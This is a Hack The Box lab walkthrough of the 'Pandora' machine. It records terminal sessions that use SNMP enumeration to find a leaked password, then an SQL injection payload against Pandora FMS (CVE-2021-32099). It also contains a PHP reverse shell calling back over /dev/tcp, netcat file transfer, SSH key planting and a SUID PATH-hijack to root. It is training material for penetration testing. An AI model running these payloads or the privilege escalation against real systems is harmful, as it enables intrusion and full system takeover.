HTB Pandora done
Pandora
OS:
Linux
Technology:
SNMP
Pandora FMS v7.0NG.742_FIX_PERL2020
IP Address:
10.10.11.136
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
161/udp open snmp
Users and pass:
Get info via SNMP
L: daniel
P: HotelBabylon23
---
Nmap - TCP scan
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.136_nmap 10.10.11.136 ; cat 10.10.11.136_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-19 09:53 CEST
Nmap scan report for 10.10.11.136
Host is up (0.066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24c295a5c30b3ff3173c68d7af2b5338 (RSA)
| 256 b1417799469a6c5dd2982fc0329ace03 (ECDSA)
|_ 256 e736433ba9478a190158b2bc89f65108 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Open website:
Nothing interesing on the website
Add hostanme to /etc/hosts
We add panda.htb to /etc/hosts
┌──(root㉿pentest)-[~]
└─# echo "10.10.11.136 panda.htb" >> /etc/hosts
┌──(root㉿pentest)-[~]
└─# cat /etc/hosts | grep panda.htb
10.10.11.136 panda.htb
┌──(root㉿pentest)-[~]
└─#
Nmap - UDP scan
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ sudo nmap -sU -oA 10.10.11.136_udp_nmap 10.10.11.136 ; cat 10.10.11.136_udp_nmap.nmap | grep "udp.*open"
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-19 12:11 CEST
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.038s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
161/udp open snmp
Enumerate SNMP
I found login and password:
L: daniel
P: HotelBabylon23
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ snmp-check 10.10.11.136 | tee 10.10.11.136_snmp_check
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.10.11.136:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.10.11.136
Hostname : pandora
Description : Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
Contact : Daniel
Location : Mississippi
Uptime snmp : 02:12:25.74
Uptime system : 02:12:18.79
System date : 2024-4-19 09:58:00.0
[*] Network information:
IP forwarding enabled : no
Default TTL : 64
TCP segments received : 67162
TCP segments sent : 68226
TCP segments retrans : 2300
Input datagrams : 78612
Delivered datagrams : 78592
Output datagrams : 80881
[*] Network interfaces:
Interface : [ up ] lo
Id : 1
Mac Address : :::::
Type : softwareLoopback
Speed : 10 Mbps
MTU : 65536
In octets : 700804
Out octets : 700804
Interface : [ up ] VMware VMXNET3 Ethernet Controller
Id : 2
Mac Address : 00:50:56:b9:28:87
Type : ethernet-csmacd
Speed : 4294 Mbps
MTU : 1500
In octets : 4467082
Out octets : 5440756
[*] Network IP:
Id IP Address Netmask Broadcast
2 10.10.11.136 255.255.254.0 1
1 127.0.0.1 255.0.0.0 0
[*] Routing information:
Destination Next hop Mask Metric
0.0.0.0 10.10.10.2 0.0.0.0 1
10.10.10.0 0.0.0.0 255.255.254.0 0
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 22 0.0.0.0 0 listen
10.10.11.136 37624 1.1.1.1 53 synSent
127.0.0.1 3306 0.0.0.0 0 listen
127.0.0.53 53 0.0.0.0 0 listen
[*] Listening UDP ports:
Local address Local port
0.0.0.0 161
127.0.0.53 53
[*] Processes:
...
...
1096 runnable host_check /usr/bin/host_check -u daniel -p HotelBabylon23
1155 runnable apache2 /usr/sbin/apache2 -k start
1314 unknown kworker/
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ cat 10.10.11.136_snmp_check| grep -C1 -i "\-u daniel"
875 runnable cron /usr/sbin/CRON -f
883 runnable sh /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
898 runnable apache2 /usr/sbin/apache2 -k start
--
1037 runnable apache2 /usr/sbin/apache2 -k start
1096 runnable host_check /usr/bin/host_check -u daniel -p HotelBabylon23
1155 runnable apache2 /usr/sbin/apache2 -k start
SSH login as user: daniel
H: 10.10.11.136
L: daniel
P: HotelBabylon23
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ ssh [email protected]
The authenticity of host 'panda.htb (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'panda.htb' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 19 Apr 10:11:59 UTC 2024
System load: 0.0
Usage of /: 63.0% of 4.87GB
Memory usage: 8%
Swap usage: 0%
Processes: 233
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:2887
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:~$ cd ~
daniel@pandora:~$ ls -a
. .. .bash_history .bash_logout .bashrc .cache .profile .ssh
daniel@pandora:~$
LinPEAS
Download linpeas.sh
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh ; file linpeas.sh
--2024-04-19 12:20:13-- https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh [following]
--2024-04-19 12:20:14-- https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://github.com/peass-ng/PEASS-ng/releases/download/20240414-ed0a5fac/linpeas.sh [following]
--2024-04-19 12:20:14-- https://github.com/peass-ng/PEASS-ng/releases/download/20240414-ed0a5fac/linpeas.sh
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/240660d8-8826-4db7-bd47-37523314ef14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240419%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240419T102015Z&X-Amz-Expires=300&X-Amz-Signature=f5e02bf15c0177e40035dfb25f643234ce7efb039eea95417d0015a7bd9dc412&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2024-04-19 12:20:14-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/240660d8-8826-4db7-bd47-37523314ef14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240419%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240419T102015Z&X-Amz-Expires=300&X-Amz-Signature=f5e02bf15c0177e40035dfb25f643234ce7efb039eea95417d0015a7bd9dc412&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.108.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860323 (840K) [application/octet-stream]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[==============================================>] 840.16K 4.98MB/s in 0.2s
2024-04-19 12:20:15 (4.98 MB/s) - ‘linpeas.sh’ saved [860323/860323]
linpeas.sh: POSIX shell script, Unicode text, UTF-8 text executable, with very long lines (1779)
Upload linepeas.sh
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.136 - - [19/Apr/2024 12:21:28] "GET /linpeas.sh HTTP/1.1" 200 -
---
daniel@pandora:~$ wget 10.10.16.7/linpeas.sh -O /tmp/linpeas.sh
--2024-04-19 10:21:29-- http://10.10.16.7/linpeas.sh
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860323 (840K) [text/x-sh]
Saving to: ‘/tmp/linpeas.sh’
/tmp/linpeas.sh 100%[==============================================>] 840.16K 1023KB/s in 0.8s
2024-04-19 10:21:30 (1023 KB/s) - ‘/tmp/linpeas.sh’ saved [860323/860323]
daniel@pandora:~$ chmod a+x /tmp/linpeas.sh
daniel@pandora:~$ /tmp/./linpeas.sh -a > linpeas.out &
[1] 2030
daniel@pandora:~$ grep: /etc/cloud/cloud.cfg: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:09 --:--:-- 0curl: (6) Could not resolve host: metadata.google.internal
Download linpeas.out
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ nc -l -p 80 > linpeas.out
---
daniel@pandora:~$ nc -w 3 10.10.16.7 80 < linpeas.out
Findings
I see that user matt can execute binary: /usr/bin/pandora_backup
___
-rwsr-x--- 1 root matt 17K Dec 3 2021 /usr/bin/pandora_backup (Unknown SUID binary!)
---
I see that website is host locally on port 80
daniel@pandora:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:161 0.0.0.0:*
udp UNCONN 0 0 [::1]:161 [::]:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
Create ssh tunnel
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ ssh -L 2222:localhost:80 -N -f -l daniel 10.10.11.136
The authenticity of host '10.10.11.136 (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:181: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.136' (ED25519) to the list of known hosts.
[email protected]'s password:
Open website: http://localhost:2222/pandora_console/
We open webiste (it is Pandora FMS Next Generation) and focus on version
v7.0NG.742_FIX_PERL2020
Exploit: CVE-2021-32099 SQLi Bypass login
https://github.com/ibnuuby/CVE-2021-32099
Run exploit
1.Run payload
http://localhost:2222/pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:"admin";' as data FROM tsessions_php WHERE '1'='1
---
2.Open website: http://localhost:2222/pandora_console/
We are the admin
Create revshell
Netcat
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.136] 44798
bash: cannot set terminal process group (850): Inappropriate ioctl for device
bash: no job control in this shell
matt@pandora:/var/www/pandora/pandora_console/images$ id
id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
matt@pandora:/var/www/pandora/pandora_console/images$
---
Upload revshell to remote shell
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ cat revshell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.7/80 0>&1'");
?>
___
Upload file: revshell.php
http://localhost:2222/pandora_console/index.php?sec=gextensions&sec2=godmode/setup/file_manager
___
Start revshell
http://localhost:2222/pandora_console/images/revshell.php
Open flag: user.txt
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.136] 44798
bash: cannot set terminal process group (850): Inappropriate ioctl for device
bash: no job control in this shell
matt@pandora:/var/www/pandora/pandora_console/images$ id
id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
matt@pandora:/var/www/pandora/pandora_console/images$ cd ~
cd ~
matt@pandora:/home/matt$ ls
ls
user.txt
matt@pandora:/home/matt$ cat user.txt
cat user.txt
96073bb63c33b95d7910c2b11523fb1c
matt@pandora:/home/matt$
Privilege Escalation
ltrace /usr/bin/pandora_backup
We see command
tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz
___
matt@pandora:/home/matt$ ls -l /usr/bin/pandora_backup
ls -l /usr/bin/pandora_backup
-rwsr-x--- 1 root matt 16816 Dec 3 2021 /usr/bin/pandora_backup
matt@pandora:/home/matt$
matt@pandora:/home/matt$ ltrace /usr/bin/pandora_backup
ltrace /usr/bin/pandora_backup
getuid() = 1000
geteuid() = 1000
setreuid(1000, 1000) = 0
puts("PandoraFMS Backup Utility") = 26
puts("Now attempting to backup Pandora"...) = 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 512
puts("Backup failed!\nCheck your permis"...) = 39
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
Backup failed!
Check your permissions!
+++ exited (status 1) +++
SSH key generate
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/kali/.ssh/id_ed25519): ./id_rsa_pandora
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa_pandora
Your public key has been saved in ./id_rsa_pandora.pub
The key fingerprint is:
SHA256:ewxjGuBtJKGVy/7b3fX9sdNGBBMVqrmPmV09MJThHAI kali@pentest
The key's randomart image is:
+--[ED25519 256]--+
| o. E.. o.+o|
| o.. + B |
| ..o.. * o |
| .o= + .|
| .. + S o o . |
| .. + = . o o|
| .. . o. .=o|
| .. o .*..oB|
| ... .+.o o*|
+----[SHA256]-----+
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ ls id_rsa_pandora*
id_rsa_pandora id_rsa_pandora.pub
Upload SSH keys
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.136 - - [22/Apr/2024 13:26:41] "GET /id_rsa_pandora.pub HTTP/1.1" 200 -
---
matt@pandora:/home/matt$ mkdir .ssh
mkdir .ssh
matt@pandora:/home/matt$ cd .ssh
cd .ssh
matt@pandora:/home/matt/.ssh$ wget 10.10.16.7/id_rsa_pandora.pub
wget 10.10.16.7/id_rsa_pandora.pub
--2024-04-22 11:26:41-- http://10.10.16.7/id_rsa_pandora.pub
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 94 [application/vnd.exstream-package]
Saving to: 'id_rsa_pandora.pub'
0K 100% 5.35K=0.02s
2024-04-22 11:26:41 (5.35 KB/s) - 'id_rsa_pandora.pub' saved [94/94]
matt@pandora:/home/matt/.ssh$ cd ..
cd ..
matt@pandora:/home/matt$ chmod -R 700 .ssh
chmod -R 700 .ssh
matt@pandora:/home/matt$ mv .ssh/id_rsa_pandora.pub .ssh/authorized_keys
mv .ssh/id_rsa_pandora.pub .ssh/authorized_keys
matt@pandora:/home/matt$
SSH connect
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Pandora]
└─$ ssh [email protected] -i /tmp/id_rsa_pandora
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 22 Apr 11:55:19 UTC 2024
System load: 0.0
Usage of /: 63.2% of 4.87GB
Memory usage: 8%
Swap usage: 0%
Processes: 240
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:3f43
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
matt@pandora:~$
SUID Path Hijack
matt@pandora:~$ cd /tmp/
matt@pandora:/tmp$ echo "/bin/bash" > tar
matt@pandora:/tmp$ chmod 777 tar
matt@pandora:/tmp$ export PATH=.:$PATH
matt@pandora:/tmp$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp# id
uid=0(root) gid=1000(matt) groups=1000(matt)
Read flag: root.txt
root@pandora:/tmp# cd /root
root@pandora:/root# ls
root.txt
root@pandora:/root# cat root.txt
4367ba92259c26a4af3e31a32bff159a
root@pandora:/root#
References
[CVE-2021-32099 SQLi Bypass login](https://github.com/ibnuuby/CVE-2021-32099)
Lessons Learned